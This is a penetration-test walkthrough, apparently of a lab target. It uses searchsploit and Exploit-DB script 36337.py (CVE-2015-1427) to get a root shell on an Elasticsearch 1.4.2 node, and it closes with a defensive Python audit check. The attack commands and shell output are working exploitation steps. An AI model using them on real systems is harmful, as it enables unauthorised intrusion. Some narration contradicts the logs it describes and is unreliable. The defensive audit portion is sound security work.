- A new lead: port 9200 on 172.17.0.2 is open, running Elasticsearch REST API 1.4.2 (name: Watcher; cluster: elasticsearch; Lucene 4.10.2). Note: Elasticsearch is the distributed search and analytics engine at the core of the Elastic Stack.
- Here we can use searchsploit to look up known Elasticsearch vulnerabilities and try them against the service to get in.
```text
┌──(kali㉿kali)-[~/Workspace]
└─$ searchsploit Elasticsearch
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
ElasticSearch - Remote Code Execution                                       | linux/remote/36337.py
ElasticSearch - Remote Code Execution                                       | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)                   | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download                               | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure                                    | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal                       | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit)        | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump                          | multiple/webapps/50152.py
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
- Try one of them: /usr/share/exploitdb/exploits/linux/remote/36337.py. Note that it needs python2 and its requests package; if they are not installed, use the following commands:
```shell
sudo apt-get install python2                                              # install python2
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py && python2 get-pip.py   # install pip for python2; skip if already present
python2 -m pip install requests                                           # install the requests package
proxychains4 -f ./proxychains.conf python2 /usr/share/exploitdb/exploits/linux/remote/36337.py 172.17.0.2   # run the 36337.py script
```
Getting in:
```text
┌──(kali㉿kali)-[~/Workspace]
└─$ proxychains4 -f ./proxychains.conf python2 36337.py 172.17.0.2
[proxychains] config file found: ./proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[ASCII-art banner]
Exploit for ElasticSearch , CVE-2015-1427
Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$
```
As you can see, the run above errors out. Looking into the error shows that this is the ElasticSearch Groovy sandbox bypass and code-execution vulnerability (CVE-2015-1427). To exploit it, the search has to return something, so the index must already hold at least one document; we therefore send the following request to add one record.
```text
┌──(kali㉿kali)-[~/Workspace]
└─$ proxychains python2 a.py 172.17.0.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[ASCII-art banner]
Exploit for ElasticSearch , CVE-2015-1427
Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ id
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK
uid=0(root) gid=0(root) groups=0(root)
~$
```
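From the defender's side, the same facts the walkthrough relied on (a 1.4.2 node, CVE-2015-1427) can be turned into an audit check. The following is an added example, not code from the original post or from Elasticsearch: it takes the JSON a node returns on `GET /`, decides whether the version falls in the range the CVE-2015-1427 advisory names (before 1.3.8, and 1.4.x before 1.4.3), and combines that with the node's script settings. It assumes the 1.3/1.4-era keys `script.groovy.sandbox.enabled` and `script.disable_dynamic` as documented for those releases; the sample `GET /` body below is constructed to mirror the banner from the scan, not a real capture.

```python
import json
from typing import Dict, Tuple

Version = Tuple[int, int, int]


def parse_version(text: str) -> Version:
    """'1.4.2' or '1.4.2-SNAPSHOT' -> (1, 4, 2); missing components default to 0."""
    core = text.split("-")[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return (parts[0], parts[1], parts[2])


def is_affected_cve_2015_1427(version: str) -> bool:
    """Affected range as stated in the advisory: before 1.3.8, and 1.4.x before 1.4.3."""
    v = parse_version(version)
    return v < (1, 3, 8) or (1, 4, 0) <= v < (1, 4, 3)


def assess_node(root_json: str, settings: Dict[str, object]) -> Dict[str, object]:
    """Combine the version from GET / with the node's flattened script settings.

    An absent key keeps the 1.3/1.4 default: sandboxed Groovy scripts are accepted
    (assumption: keys as documented for those releases).
    """
    info = json.loads(root_json)
    version = info["version"]["number"]
    affected = is_affected_cve_2015_1427(version)
    sandbox_on = str(settings.get("script.groovy.sandbox.enabled", "true")).lower() == "true"
    dynamic_off = str(settings.get("script.disable_dynamic", "sandbox")).lower() == "true"
    # Exposure persists only while the version is affected AND dynamic Groovy scripts
    # are still accepted; either an upgrade or one of the two settings closes it.
    exposed = affected and sandbox_on and not dynamic_off
    return {"node": info.get("name"), "version": version, "affected_version": affected,
            "groovy_sandbox_enabled": sandbox_on, "exposed": exposed,
            "action": ("upgrade to 1.3.8/1.4.3 or later, or set script.groovy.sandbox.enabled: false"
                       if exposed else "no action required for CVE-2015-1427")}


# Constructed sample of a GET / response shaped like the scanned node (not a real capture).
SAMPLE_ROOT = json.dumps({
    "status": 200, "name": "Watcher", "cluster_name": "elasticsearch",
    "version": {"number": "1.4.2", "lucene_version": "4.10.2"},
    "tagline": "You Know, for Search"})

if __name__ == "__main__":
    print(assess_node(SAMPLE_ROOT, {}))                                              # exposed
    print(assess_node(SAMPLE_ROOT, {"script.groovy.sandbox.enabled": "false"}))      # hardened
```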